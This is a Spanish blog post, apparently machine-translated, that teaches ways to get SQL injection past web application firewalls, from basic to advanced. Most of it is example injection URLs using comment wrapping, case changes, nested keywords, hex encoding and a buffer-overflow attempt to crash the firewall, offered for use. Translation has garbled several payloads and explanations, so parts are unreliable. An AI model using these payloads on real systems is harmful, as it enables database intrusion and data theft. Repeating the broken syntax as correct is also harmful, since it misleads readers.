HACKER ANGELWHITE GALC

martes, 9 de septiembre de 2014

Basic to Advanced WAF Bypassing Methods

Hoy os voy a mostrar cómo eludir Web Application Firewalls ( WAF ). Voy a demostrar desde la más simple y la mayoría de técnicas básicas hasta las más avanzadas!
NOTA: Inyección SQL no se demuestra aquí! Si usted no sabe la inyección de SQL, lea esto primero ...

¿Qué es WAF?

WAF significa Web Application Firewall. Es ampliamente utilizado en la actualidad para detectar y defender Inyecciones SQL!
Vamos a comenzar!

¿Cómo saber si hay un Web Application Firewall?

Esto es bastante simple! Al intentar introducir un comando utilizado para inyección de SQL (normalmente el comando "UNION SELECT"), se obtiene un error 403 (y el sitio web dice "Prohibido" o "no aceptable"). 
Ejemplo:
http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4 .... (Tenemos un 403 Error!)

Básicos / Métodos sencillos:

En primer lugar, por supuesto, tenemos que conocer los métodos básicos para omitir WAF ...
1) Comentarios:
Puede utilizar los comentarios para eludir WAF:
http://www.site.com/index.php?page_id=-15 / *! UNION * / / *! SELECT * / 1,2,3,4 .... 
(Primer método que se puede pasar por alto WAF)
Sin embargo, la mayoría WAF identificar este método por lo que todavía muestran un error "Forbidden" ...
2) Cambiar el caso de las Letras:
También puede cambiar el caso del comando:
http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4 .... 
(Otro método básico para Bypass WAF!)
Sin embargo, como antes, este truco también es detectado por la mayoría WAF!
3) Combinar los métodos anteriores:
Lo que también puedes hacer es combinar los dos métodos anteriores:
http://www.site.com/index.php?page_id=-15 / *! unión * / / *! SELECT * / 1,2,3,4 ....
Este método no es detectable por muchos cortafuegos de aplicación Web! 
4) Sustituido Palabras clave:
Algunos servidores de seguridad Elimine la sentencia "UNION SELECT" cuando se encuentra en la URL ... Podemos hacer esto para explotar esta función:
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4 .... 
(La "unión" y "seleccionar" serán eliminados, por lo que el resultado final será: "UNION SELECT" :-D )
Este método no funciona en todos los firewalls, ya que sólo algunos de ellos eliminar la "UNION" y el "SELECT" Comandos cuando se detectan!
5) Inline Comentarios: 
Algunos servidores de seguridad consiguen pasar por encima de Inserción de comentarios en línea entre la "Unión" y "Seleccionar" Comandos:
http://www.site.com/index.php?page_id=-15 % 55nION / ** /% 53ElecT 1,2,3,4 ... 
(El 55% es igual a "U" y 53% a "S ". Ver más en la Sección Avanzada ...).
Creo que estos son los métodos más básicos a WAF Anulación! Vamos a pasar otras más avanzadas ...

Métodos avanzados:

Ahora que ha aprendido sobre Básica WAF Anulación, creo que es bueno para entender los métodos más avanzados!
1) Buffer Overflow / Firewall Crash:
Muchos servidores de seguridad son desarrolladas en C / C ++ y podemos Crash usando Buffer Overflow!
http://www.site.com/index.php?page_id=-15+and+(select 1) = (Select 0xAA [.. (añadir alrededor de 1000 "A") ..]) + / *! unión * / + / * Elegir * / + 1,2,3,4 ....
((Se puede probar si el WAF puede estrelló escribiendo: 
?!! page_id = null% 0A / ** // * 50000% 55nIOn * // * yoyu * / all / ** /% 0A / *% 53eLEct * /% 0A / * nnaa * / + 1,2,3,4 ....
Si usted consigue un 500, puede explotarla usando el Método de desbordamiento de búfer! ))
2) sustituir caracteres con sus valores hexadecimales:
Podemos reemplazar algunos caracteres con su HEX (URL-codificado) Valores. 
Ejemplo:
http://www.site.com/index.php?page_id=-15 / *! u% 6eion * / / *! sí 6cect% * / 1,2,3,4 .... 
(que significa "union select" )
Texto para Hex Encoder (Elija la opción "Hex codificados para URL" número!):http://www.swingnote.com/tools/texttohex.php
3) Utilice otras variables o comandos en lugar de las comunes para SQLi:
Aparte de las "UNION SELECT" otros comandos podría ser bloqueado. 
Comandos Común Bloqueado:
COMANDO | QUE PUEDE USAR EN LUGAR

@@Version | Versión ()
concat () | CONCAT_WS () -> Diferencia entre concat () y () CONCAT_WS: http://is.gd/VEeiDU 
GROUP_CONCAT () | CONCAT_WS ()
Aprender MySQL Realmente ayuda sobre estos temas! ;-)
4) Funciones Misc explotables:
Muchos firewalls tratan de ofrecer más protección al agregar Prototype o extrañas funciones! (Lo cual, por supuesto, podemos explotar!): 
Ejemplo:
Este firewall continuación reemplaza "*" (asterisco) con espacios en blanco! Lo que podemos hacer es lo siguiente:
(Si el Firewall elimina el "*", el resultado será:. 15 + union + select ...) 
Por lo tanto, si usted encuentra una función tan tonta, puede explotarla, de esta manera! :-D
[+] Además del ejemplo anterior, algunas otras derivaciones podrían ser:
-15+ (Unión) + (SELECT) ....
-15+ (Unión + seleccione) + ...
-15+ (UNI) (a) + (SEL) (ECT) + ....
-15 + Union (select 1,2,3,4 ...)

esta información es dada  por mi amigo  RED TOOR

No hay comentarios:

Publicar un comentario